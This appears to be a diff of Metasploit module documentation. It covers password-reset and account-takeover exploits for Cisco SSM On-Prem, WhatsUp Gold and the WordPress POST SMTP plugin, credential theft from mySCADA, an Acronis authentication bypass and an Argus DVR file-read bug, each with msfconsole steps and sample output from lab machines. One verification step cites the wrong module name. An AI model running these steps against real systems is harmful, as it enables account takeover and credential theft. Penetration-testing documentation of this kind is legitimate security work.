-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
-SMBPass => Password1
-msf6 auxiliary(admin/dcerpc/samr_computer) > show options
-
-Module options (auxiliary/admin/dcerpc/samr_computer):
-
-   Name               Current Setting  Required  Description
-   ----               ---------------  --------  -----------
-   COMPUTER_NAME                       no        The computer name
-   COMPUTER_PASSWORD                   no        The password for the new computer
-   RHOSTS             192.168.159.96   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT              445              yes       The target port (TCP)
-   SMBDomain          .                no        The Windows domain to use for authentication
-   SMBPass            Password1        no        The password for the specified username
-   SMBUser            aliddle          no        The username to authenticate as
-
-
-Auxiliary action:
-
-   Name          Description
-   ----          -----------
-   ADD_COMPUTER  Add a computer account
-
-
-msf6 auxiliary(admin/dcerpc/samr_computer) > run
-[*] Running module against 192.168.159.96
-
-[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
-[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
-[*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/samr_computer) > creds
-Credentials
-===========
-
-host            origin          service        public             private                           realm   private_type  JtR Format
----            ------          -------        ------             -------                           -----   ------------  ----------
-192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password
-
-msf6 auxiliary(admin/dcerpc/samr_computer) >
-```
@@ -0,0 +1,55 @@
+## Vulnerable Application
+
+This module exploits an improper access control vulnerability in Cisco Smart Software Manager (SSM) On-Prem <= 8-202206 (CVE-2024-20419),
+by changing the password of the admin user.
+
+The vendor published an advisory [here]
+(https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy). The original research blog
+is available [here](https://www.0xpolar.com/blog/CVE-2024-20419).
+
+## Testing
+
+The software can be obtained from the [vendor](https://software.cisco.com/download/home/286285506/type/286326948/release/9-202407).
+
+Deploy it by following the vendor's [installation guide]
+(https://www.cisco.com/web/software/286285517/152313/Smart_Software_Manager_On-Prem_8-202006_Installation_Guide.pdf).
+
+**Successfully tested on**
+
+- Cisco Smart Software Manager (SSM) On-Prem v8-202206.
+
+## Verification Steps
+
+1. Deploy Cisco Smart Software Manager (SSM) On-Prem v8-202206
+2. Start `msfconsole`
+3. `use auxiliary/admin/http/fortra_filecatalyst_workflow_sqli`
+4. `set RHOSTS <IP>`
+5. `run`
+6. A new password should have been set for the admin account.
+
+## Options
+
+### USER
+The user of which the password should be changed (default: admin)
+### NEW_PASSWORD
+Password to be used when creating a new user with admin privileges.
+
+## Scenarios
+
+Running the module against Smart Software Manager (SSM) On-Prem v8-202206 should result in an output
+similar to the following:
+
+```
+msf6 > use auxiliary/admin/http/cisco_ssm_onprem_account 
+msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set RHOSTS 192.168.137.200
+msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > exploit 
+[*] Running module against 192.168.137.200
+
+[+] Server reachable.
+[+] Retrieved XSRF Token: RAjYUE7aNosSoXUHQu3S2VWj2h+t5ioGFCV8PwMIkNIkX15f1H10sJJY5V1yTG6tsSkhonOIr2lI3VhseclCRw==
+[+] Retrieved _lic_engine_session: 22b193146b9071bbf695182f22bfcb09
+[+] Retrieved auth_token: 73e63ab74a07d9d4099d0c9918c21ceaad1c2db94058b32aa6d990178dbe13b5
+[+] Password for the admin user was successfully updated: Epd45bZ9OCJIFiEr!
+[+] Login at: http://192.168.137.200:8443/#/logIn?redirectURL=%2F
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,53 @@
+## Vulnerable Application
+
+This module exploits a SQL injection vulnerability in WhatsUp Gold < v24.0.0 (CVE-2024-6670), by changing the password of an existing user
+(such as of the default `admin` account) to an attacker-controlled one.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://cdn.ipswitch.com/nm/WhatsUpGold/23.1.3/WhatsUpGold-23.1.3-FullInstall.exe).
+
+Installation instructions are available [here](https://docs.progress.com/bundle/whatsupgold-install-23-1/page/Prior-to-installation.html).
+
+**Successfully tested on**
+
+- WhatsUp Gold v23.1.3 on Windows 22H2
+- WhatsUp Gold v23.1.2 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/admin/http/whatsup_gold_sqli 
+msf6 auxiliary(admin/http/whatsup_gold_sqli) > set RHOSTS <IP>
+msf6 auxiliary(admin/http/whatsup_gold_sqli) > run
+```
+
+This should update the password of the default `admin` account.
+
+## Options
+
+### USERNAME
+The user of which to update the password (default: admin)
+
+### PASSWORD
+The new password for the user
+
+## Scenarios
+
+Running the exploit against WhatsUp Gold v23.1.3 on Windows 22H2 should result in an output similar to the following:
+
+```
+msf6 auxiliary(admin/http/whatsup_gold_sqli) > run
+[*] Running module against 192.168.217.143
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version: 23.1.3
+[+] New password for admin was successfully set:
+	admin:SzESLHhWxKyf
+[+] Login at: https://192.168.217.143/NmConsole/#home
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,105 @@
+## Vulnerable Application
+
+The POST SMTP WordPress plugin prior to 2.8.7 is affected by a privilege
+escalation where an unauthenticated user is able to reset the password
+of an arbitrary user. This is done by requesting a password reset, then
+viewing the latest email logs to find the associated password reset email.
+
+### Install
+
+1. Create `wp_post_smtp_acct_takeover.docker-compose.yml` with the content:
+```
+version: '3.1'
+
+services:
+  wordpress:
+    image: wordpress:latest
+    restart: always
+    ports:
+      - 5555:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: chocapikk
+      WORDPRESS_DB_PASSWORD: dummy_password
+      WORDPRESS_DB_NAME: exploit_market
+    mem_limit: 512m
+    volumes:
+      - wordpress:/var/www/html
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: exploit_market
+      MYSQL_USER: chocapikk
+      MYSQL_PASSWORD: dummy_password
+      MYSQL_RANDOM_ROOT_PASSWORD: '1'
+    volumes:
+      - db:/var/lib/mysql
+
+volumes:
+  wordpress:
+  db:
+
+```
+2. `docker-compose -f wp_post_smtp_acct_takeover.docker-compose.yml up`
+3. `wget https://downloads.wordpress.org/plugin/post-smtp.2.8.6.zip`
+4. `unzip post-smtp.2.8.6.zip`
+5. `docker cp post-smtp <wordpress_container_id>:/var/www/html/wp-content/plugins`
+6. Complete the setup of wordpress
+7. Enable the post-smtp plugin, select "default" for the SMTP service
+  1. Complete the setup using random information, it isn't validated.
+8. Update permalink structure per https://github.com/rapid7/metasploit-framework/pull/18164#issuecomment-1623744244
+  1. Settings -> Permalinks -> Permalink structure -> Select "Post name" -> Save Changes.
+
+
+## Verification Steps
+
+1. Install the vulnerable plugin
+2. Start msfconsole
+3. Do: `use auxiliary/admin/http/wp_post_smtp_acct_takeover`
+4. Do: `set rhost 127.0.0.1`
+5. Do: `set rport 5555`
+6. Do: `set ssl false`
+7. Do: `set username <username>`
+8. Do: `set verbose true`
+9. Do: `run`
+10. Visit the output URL to reset the user's password.
+
+## Options
+
+### USERNAME
+
+The username to perform a password reset against
+
+## Scenarios
+
+### Wordpress 6.6.2 with SMTP Post 2.8.6 on Docker
+
+```
+msf6 > use auxiliary/admin/http/wp_post_smtp_acct_takeover
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set rport 5555
+rport => 5555
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set ssl false
+ssl => false
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set username admin
+username => admin
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set verbose true
+verbose => true
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > run
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/post-smtp/readme.txt
+[*] Found version 2.8.6 in the plugin
+[+] The target appears to be vulnerable.
+[*] Attempting to Registering token fUefO7U12dXtb0DM on device GP3tOFuMfFErw
+[+] Succesfully created token: fUefO7U12dXtb0DM
+[*] Requesting logs
+[*] Requesting email content from logs for ID 4
+[+] Full text of log saved to: /home/mtcyr/.msf4/loot/20241029142103_default_127.0.0.1_wordpress.post_s_367186.txt
+[+] Reset URL: http://127.0.0.1:5555/wp-login.php?action=rp&key=4kxMwfuvyQtcUDVrh985&login=admin&wp_lang=en_US
+[*] Auxiliary module execution completed
+```
@@ -5,7 +5,7 @@ This module can read, write, update, and delete AD CS certificate templates from
 The READ, UPDATE, and DELETE actions will write a copy of the certificate template to disk that can be
 restored using the CREATE or UPDATE actions. The CREATE and UPDATE actions require a certificate template data
 file to be specified to define the attributes. Template data files are provided to create a template that is
-vulnerable to ESC1, ESC2, and ESC3.
+vulnerable to ESC1, ESC2, ESC3 and ESC15.

 This module is capable of exploiting ESC4.

@@ -0,0 +1,39 @@
+## Introduction
+
+Allows changing or resetting users' passwords over the LDAP protocol (particularly for Active Directory).
+
+"Changing" refers to situations where you know the value of the existing password, and send that to the server as part of the password modification.
+"Resetting" refers to situations where you may not know the value of the existing password, but by virtue of your permissions over the target account, you can force-change the password without necessarily knowing it.
+
+Note that users can typically not reset their own passwords (unless they have very high privileges), but can usually change their password as long as they know the existing one.
+
+This module works with existing sessions (or relaying), especially for Resetting, wherein the target's password is not required.
+
+## Actions
+
+- `RESET` - Reset the target's password without knowing the existing one (requires appropriate permissions)
+- `CHANGE` - Change the user's password, knowing the existing one.
+
+## Options
+
+The required options are based on the action being performed:
+
+- When resetting a password, you must specify the `TARGET_USER`
+- When changing a password, you must specify the `USERNAME` and `PASSWORD`, even if using an existing session (since the API requires both of these to be specified, even for open LDAP sessions)
+- The `NEW_PASSWORD` option must always be provided
+
+**USERNAME**
+
+The username to use to authenticate to the server. Required for changing a password, even if using an existing session.
+
+**PASSWORD**
+
+The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).
+
+**TARGET_USER**
+
+For resetting passwords, the user account for which to reset the password. The authenticated account (username) must have privileges over the target user (e.g. Ownership, or the `User-Force-Change-Password` extended right)
+
+**NEW_PASSWORD**
+
+The new password to set.
@@ -62,14 +62,14 @@ PropagationFlags      : None

 ## Module usage

-The `admin/dcerpc/samr_computer` module is generally used to first create a computer account, which requires no permissions:
+The `admin/dcerpc/samr_account` module is generally used to first create a computer account, which by default, all user accounts in a domain can perform:

 1. From msfconsole
-2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+2. Do: `use auxiliary/admin/dcerpc/samr_account`
 3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
-   a. For the `ADD_COMPUTER` action, if you don't specify `COMPUTER_NAME` or `COMPUTER_PASSWORD` - one will be generated automatically
-   b. For the `DELETE_COMPUTER` action, set the `COMPUTER_NAME` option
-   c. For the `LOOKUP_COMPUTER` action, set the `COMPUTER_NAME` option
+   a. For the `ADD_COMPUTER` action, if you don't specify `ACCOUNT_NAME` or `ACCOUNT_PASSWORD` - one will be generated automatically
+   b. For the `DELETE_ACCOUNT` action, set the `ACCOUNT_NAME` option
+   c. For the `LOOKUP_ACCOUNT` action, set the `ACCOUNT_NAME` option
 4. Run the module and see that a new machine account was added

 Then the `auxiliary/admin/ldap/rbcd` can be used:
@@ -121,19 +121,30 @@ with the Service for User (S4U) Kerberos extension.
 First create the computer account:

 ```msf
-msf6 auxiliary(admin/dcerpc/samr_computer) > show options
+msf6 auxiliary(admin/dcerpc/samr_account) > show options

-Module options (auxiliary/admin/dcerpc/samr_computer):
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   ACCOUNT_NAME                       no        The account name
+   ACCOUNT_PASSWORD                   no        The password for the new account

-   Name               Current Setting  Required  Description
-   ----               ---------------  --------  -----------
-   COMPUTER_NAME                       no        The computer name
-   COMPUTER_PASSWORD                   no        The password for the new computer
-   RHOSTS                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT              445              yes       The target port (TCP)
-   SMBDomain          .                no        The Windows domain to use for authentication
-   SMBPass                             no        The password for the specified username
-   SMBUser                             no        The username to authenticate as
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   RHOSTS                      no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      445              yes       The target port (TCP)
+   SMBDomain  .                no        The Windows domain to use for authentication
+   SMBPass                     no        The password for the specified username
+   SMBUser                     no        The username to authenticate as


 Auxiliary action:
@@ -143,13 +154,13 @@ Auxiliary action:
   ADD_COMPUTER  Add a computer account


-msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.10
+msf6 auxiliary(admin/dcerpc/samr_account) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser sandy
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBUser sandy
 SMBUser => sandy
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1!
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBPass Password1!
 SMBPass => Password1!
-msf6 auxiliary(admin/dcerpc/samr_computer) > run
+msf6 auxiliary(admin/dcerpc/samr_account) > run
 [*] Running module against 192.168.159.10

 [*] 192.168.159.10:445 - Using automatically identified domain: MSFLAB
@@ -157,7 +168,7 @@ msf6 auxiliary(admin/dcerpc/samr_computer) > run
 [+] 192.168.159.10:445 -   Password: A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT
 [+] 192.168.159.10:445 -   SID:      S-1-5-21-3402587289-1488798532-3618296993-1655
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd
+msf6 auxiliary(admin/dcerpc/samr_account) > use auxiliary/admin/ldap/rbcd
 ```

 Now use the RBCD module to read the current value of `msDS-AllowedToActOnBehalfOfOtherIdentity`:
@@ -181,7 +192,7 @@ msf6 auxiliary(admin/ldap/rbcd) > read
 [*] Auxiliary module execution completed
 ```

-Writing a new `msDS-AllowedToActOnBehalfOfOtherIdentity` value using the computer account created by `admin/dcerpc/samr_computer`:
+Writing a new `msDS-AllowedToActOnBehalfOfOtherIdentity` value using the computer account created by `admin/dcerpc/samr_account`:

 ```msf
 msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_FROM DESKTOP-QLSTR9NW$
@@ -0,0 +1,64 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits two vulnerabilities (CVE-2025-24865 & CVE-2025-22896) in mySCADA MyPRO Manager <= v1.3 to retrieve the configured
+credentials for the mail server.
+
+The administrative web interface has certain features where credentials are required to be accessed, but the implementation is flawed,
+allowing to bypass the requirement. Other important administrative features do not require credentials at all, allowing an unauthenticated
+remote attacker to perform privileged actions. These issues are tracked through CVE-2025-24865.
+Another vulnerability, tracked through CVE-2025-22896, is related to the cleartext storage of various credentials by the application.
+
+One way how these issues can be exploited is to allow an unauthenticated remote attacker to retrieve the cleartext credentials of the mail
+server that is configured by the product, which this module does.
+
+Versions <= 1.3 are affected. CISA published [ICSA-25-044-16](https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-16) to cover
+the security issues.
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor](https://www.myscada.org/mypro/).
+
+**Successfully tested on**
+
+- mySCADA MyPRO Manager 1.3 on Windows 11 (22H2)
+
+## Verification Steps
+
+1. Install the application
+2. After installation, reboot the system and wait some time until a runtime (e.g., 9.2.1) has been fetched and installed.
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/admin/scada/mypro_mgr_creds 
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > set RHOSTS <IP>
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > run 
+```
+
+## Scenarios
+
+Running the module against MyPRO Manager v1.3 on Windows 11, should result in an output similar to the
+following:
+
+```
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > run
+[*] Running module against 192.168.1.78
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[+] Mail server credentials retrieved:
+[+] Host: smtp.example.com
+[+] Port: 993
+[+] Auth Type: login
+[+] User: user
+[+] Password: SuperS3cr3t!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > creds
+Credentials
+===========
+
+host          origin        service           public  private       realm  private_type  JtR Format  cracked_password
+----          ------        -------           ------  -------       -----  ------------  ----------  ----------------
+192.168.1.78  192.168.1.78  34022/tcp (http)  user    SuperS3cr3t!         Password
+```
@@ -0,0 +1,46 @@
+## Introduction
+
+Allows changing or resetting users' passwords.
+
+"Changing" refers to situations where you know the value of the existing password, and send that to the server as part of the password modification.
+"Resetting" refers to situations where you may not know the value of the existing password, but by virtue of your permissions over the target account, you can force-change the password without necessarily knowing it.
+
+Note that users can typically not reset their own passwords (unless they have very high privileges).
+
+This module works with existing sessions (or relaying), especially for Reset use cases, wherein the target's password is not required.
+
+## Actions
+
+- `RESET` - Reset the target's password without knowing the existing one (requires appropriate permissions). New AES kerberos keys will be generated.
+- `RESET_NTLM` - Reset the target's NTLM hash, without knowing the existing password. AES kerberos authentication will not work until a standard password change occurs.
+- `CHANGE` - Change the password, knowing the existing one. New AES kerberos keys will be generated.
+- `CHANGE_NTLM` - Change the password to a NTLM hash value, knowing the existing password. AES kerberos authentication will not work until a standard password change occurs.
+
+## Options
+
+The required options are based on the action being performed:
+
+- When resetting a password, you must specify the `TARGET_USER`
+- When changing a password, you must specify the `SMBUser` and `SMBPass`, even if using an existing session (since the API requires both of these to be specified, even for open SMB sessions)
+- When resetting or changing a password, you must specify `NEW_PASSWORD`
+- When resetting or changing an NTLM hash, you must specify `NEW_NTLM`
+
+**SMBUser**
+
+The username to use to authenticate to the server. Required for changing a password, even if using an existing session.
+
+**SMBPass**
+
+The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).
+
+**TARGET_USER**
+
+For resetting passwords, the user account for which to reset the password. The authenticated account (SMBUser) must have privileges over the target user (e.g. Ownership, or the `User-Force-Change-Password` extended right)
+
+**NEW_PASSWORD**
+
+The new password to set for `RESET` and `CHANGE` actions. 
+
+**NEW_NTLM**
+
+The new NTLM hash to set for `RESET_NTLM` and `CHANGE_NTLM` actions. This can either be an NT hash, or a colon-delimited NTLM hash.
@@ -0,0 +1,205 @@
+## Vulnerable Application
+Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all, compute, storage and application resources.
+Businesses and Service Providers are using it to protect and backup all IT assets in their IT environment.
+
+This module exploits an authentication bypass vulnerability at the Acronis Cyber Protect appliance which,
+in its default configuration, allows the anonymous registration of new backup/protection agents on new endpoints.
+This API endpoint also generates bearer tokens which the agent then uses to authenticate to the appliance.
+As the management web console is running on the same port as the API for the agents,
+this bearer token is also valid for any actions on the web console.
+This allows an attacker with network access to the appliance to start the registration of a new agent,
+retrieve a bearer token that provides admin access to the available functions in the web console.
+
+This module will gather all machine info (endpoints) configured and managed by the appliance.
+This information can be used in a subsequent attack that exploits this vulnerability to execute arbitrary commands
+on both the managed endpoint and the appliance itself.
+This exploit is covered in another module `exploit/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405`.
+
+Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and
+Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.
+
+The following releases were tested.
+
+**Acronis Cyber Protect 15  ISO appliances:**
+* Acronis Cyber Protect 15 Build 28503
+* Acronis Cyber Protect 15 Build 27009
+* Acronis Cyber Protect 15 Build 26981
+* Acronis Cyber Protect 15 Build 26172
+
+**Acronis Cyber Protect 12.5  ISO appliances:**
+* Acronis Cyber Protect 12.5 Build 16428
+* Acronis Cyber Protect 12.5 Build 16386
+* Acronis Cyber Protect 12.5 Build 14330
+* Acronis Cyber Protect 12.5 Build 11010
+
+## Installation steps to install the Acronis Cyber Protect/Backup appliance
+* Install the virtualization engine VMware Fusion on your preferred platform.
+* [Install VMware Fusion on MacOS](https://knowledge.broadcom.com/external/article/315638/download-and-install-vmware-fusion.html).
+* [Download ISO Image](https://care.acronis.com/s/article/71847-Acronis-Cyber-Protect-Links-to-download-installation-files?language=en_US).
+* Install the Acronis iso image in your virtualization engine by unzipping the appliance image and import the `ovf` image.
+* During the boot, select `Install appliance` and  configure the installation settings such as setting the root password and IP address
+* using the option `change installation settings`.
+* Boot up the VM and should be able to access the Acronis Cyber Protect/Backup appliance either thru the console, `ssh` on port `22`
+* via the `webui` via `http://your_ip:9877`.
+* Ensure that you have registered yourself on the Acronis Web site and applied for the 30-days trial for Acronis Cyber Protect.
+* Login into the appliance via the `webui`.
+* Follow the license instructions to apply your 30-day trial license.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `auxiliary/gather/acronis_cyber_protect_machine_info_disclosure`
+- [ ] `set rhosts <ip-target>`
+- [ ] `run`
+- [ ] you should get a list of all endpoints that are registered at the appliance.
+
+## Options
+### OUTPUT
+You can use option `table` to print output of the gather info to the console (default).
+Choosing option `json` will store all information at a file in `json` format at the loot directory.
+You can use this file in combination with `jq` for offline queries and processing.
+
+## Scenarios
+```msf
+msf6 auxiliary(gather/acronis_cyber_protect_machine_info_disclosure) > info
+
+       Name: Acronis Cyber Protect/Backup machine info disclosure
+     Module: auxiliary/gather/acronis_cyber_protect_machine_info_disclosure
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Sandro Tolksdorf of usd AG.
+
+Module side effects:
+ artifacts-on-disk
+ ioc-in-logs
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  OUTPUT     table            yes       Output format to use (Accepted: table, json)
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                        metasploit.html
+  RPORT      9877             yes       The target port (TCP)
+  SSL        true             no        Negotiate SSL/TLS for outgoing connections
+  TARGETURI  /                yes       The URI of the vulnerable Acronis Cyber Protect/Backup instance
+  VHOST                       no        HTTP server virtual host
+
+Description:
+  Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all,
+  compute, storage and application resources. Businesses and Service Providers are using it
+  to protect and backup all IT assets in their IT environment.
+  This module exploits an authentication bypass vulnerability at the Acronis Cyber Protect
+  appliance which, in its default configuration, allows the anonymous registration of new
+  backup/protection agents on new endpoints. This API endpoint also generates bearer tokens
+  which the agent then uses to authenticate to the appliance.
+  As the management web console is running on the same port as the API for the agents, this
+  bearer token is also valid for any actions on the web console. This allows an attacker
+  with network access to the appliance to start the registration of a new agent, retrieve
+  a bearer token that provides admin access to the available functions in the web console.
+
+  This module will gather all machine info (endpoints) configured and managed by the appliance.
+  This information can be used in a subsequent attack that exploits this vulnerability to
+  execute arbitrary commands on both the managed endpoint and the appliance which is covered
+  in another module `exploit/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405`.
+
+  Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and
+  Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2022-30995
+  https://nvd.nist.gov/vuln/detail/CVE-2022-3405
+  https://herolab.usd.de/security-advisories/usd-2022-0008/
+  https://attackerkb.com/topics/27RudJXbN4/cve-2022-30995
+
+View the full module info with the info -d command.
+```
+### Acronis Cyber Backup 12.5 build 14330 VMware appliance
+```msf
+msf6 auxiliary(gather/acronis_cyber_protect_machine_info_disclosure) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 auxiliary(gather/acronis_cyber_protect_machine_info_disclosure) > run
+
+[*] Running module against 192.168.201.6
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Retrieve the first access token.
+[*] Register a dummy backup agent.
+[*] Dummy backup agent registration is successful.
+[*] Retrieve the second access token.
+[+] The target appears to be vulnerable. Acronis Cyber Protect/Backup 12.5.14330
+[*] Retrieve all managed endpoint configuration details registered at the Acronis Cyber Protect/Backup appliance.
+[*] List the managed endpoints registered at the Acronis Cyber Protect/Backup appliance.
+[*] ----------------------------------------
+[+] hostId: 28BAFD9F-F9F1-481F-A970-1A6ED70736AC
+[+] parentId: phm-group.7C2057CC-8D32-40CA-9B83-4A8E73078F7F.disks
+[+] key: phm.0CA16CD4-1C6D-44D2-BEF1-B9F146005EE1@28BAFD9F-F9F1-481F-A970-1A6ED70736AC.disks
+[*] type: machine
+[*] hostname: WIN-BJDNH44EEDB
+[*] IP: 192.168.201.5
+[*] OS: Microsoft Windows Server 2019 Standard
+[*] ARCH: windows
+[*] ONLINE: false
+[*] ----------------------------------------
+[+] hostId: 345C3F1E-92C3-4E92-8EF8-AC6BF136BB83
+[+] parentId: phm-group.7C2057CC-8D32-40CA-9B83-4A8E73078F7F.disks
+[+] key: phm.F70D1B08-5097-4CE5-8E22-F9E0DB75401F@345C3F1E-92C3-4E92-8EF8-AC6BF136BB83.disks
+[*] type: machine
+[*] hostname: AcronisAppliance-AC319
+[*] IP: 192.168.201.6
+[*] OS: GNU/Linux
+[*] ARCH: linux
+[*] ONLINE: true
+[*] Auxiliary module execution completed
+```
+### Acronis Cyber Backup 15 build 27009 VMware appliance
+```msf
+msf6 auxiliary(gather/acronis_cyber_protect_machine_info_disclosure) > run
+[*] Running module against 192.168.201.6
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Retrieve the first access token.
+[*] Register a dummy backup agent.
+[*] Dummy backup agent registration is successful.
+[*] Retrieve the second access token.
+[+] The target appears to be vulnerable. Acronis Cyber Protect/Backup 15.0.27009
+[*] Retrieve all managed endpoint configuration details registered at the Acronis Cyber Protect/Backup appliance.
+[*] List the managed endpoints registered at the Acronis Cyber Protect/Backup appliance.
+[*] ----------------------------------------
+[+] hostId: D287E868-EDBB-4FE9-85A9-F928AA10EE5D
+[+] parentId: 00000000-0000-0000-0000-000000000000
+[+] key: phm.EA9A6E26-38B5-4727-9957-FD7CDD7BF2CC@D287E868-EDBB-4FE9-85A9-F928AA10EE5D.disks
+[*] type: machine
+[*] hostname: AcronisAppliance-FCD94
+[*] IP: 192.168.201.6
+[*] OS: Linux: CentOS Linux release 7.6.1810 (Core)
+[*] ARCH: linux
+[*] ONLINE: true
+[*] ----------------------------------------
+[+] hostId: C0FBDC6F-A5FE-4710-ADE8-99B3F8A7CE1E
+[+] parentId: 00000000-0000-0000-0000-000000000000
+[+] key: phm.1100195A-112E-4904-A933-264C2D12A4A5@C0FBDC6F-A5FE-4710-ADE8-99B3F8A7CE1E.disks
+[*] type: machine
+[*] hostname: victim.evil.corp
+[*] IP: 192.168.201.2
+[*] OS: Microsoft Windows Server 2022 Standard
+[*] ARCH: windows
+[*] ONLINE: false
+[*] Auxiliary module execution completed
+```
+
+## Limitations
+No limitations.
@@ -0,0 +1,46 @@
+## Vulnerable Application
+This module leverages an issue with how the `RESULTPAGE` parameter within `WEBACCCOUNT.cgi` handles file referencing and as a result is vulnerable to Local File Inclusion (LFI). 
+
+## Options
+To successfully read contents of the Windows file system you must set the full file path of the file you want to check using `TARGET_FILE` (not including the drive letter prefix). 
+As a first run it is recommended to try leaking `Windows/system.ini` as a validation exercise on your first module run.
+
+## Testing
+To setup a test environment, the following steps can be performed:
+1. Set up a Windows operating system (any OS that has C:\Windows\system.ini)
+2. Download the [Argus DVR 4 Software](https://download.cnet.com/argus-surveillance-dvr/3000-2348_4-10576796.html)
+3. Run the Argus software and a webpage running on port 8080 will appear. Take note of the machine's IP
+4. On your attacker machine follow the verification steps below.
+
+## Verification Steps
+1. start msfconsole
+2. `use auxiliary/gather/argus_dvr4_lfi_cve_2018_15745`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set TARGET_FILE Windows/system.ini`
+5. `run`
+
+## Scenarios
+### Utilising Argus DVR 4 CVE-2018-15745 to Leak DVRParams.ini
+```
+msf6 > use auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745 
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > set RHOSTS 192.168.1.15
+RHOSTS => 192.168.1.15
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > set TARGET_FILE ProgramData/PY_Software/Argus Surveillance DVR/DVRParams.ini
+TARGET_FILE => ProgramData/PY_Software/Argus Surveillance DVR/DVRParams.ini
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > run
+[*] Running module against 192.168.1.15
+[*] Sending request to 192.168.1.15:8080 for file: ProgramData/PY_Software/Argus%20Surveillance%20DVR/DVRParams.ini
+[+] File retrieved successfully!
+[Main]
+ServerName=
+ServerLocation=
+ServerDescription=
+ReadH=0
+UseDialUp=0
+DialUpConName=
+DialUpDisconnectWhenDone=0
+DIALUPUSEDEFAULTS" checked checked
+
+[*] Auxiliary module execution completed
+
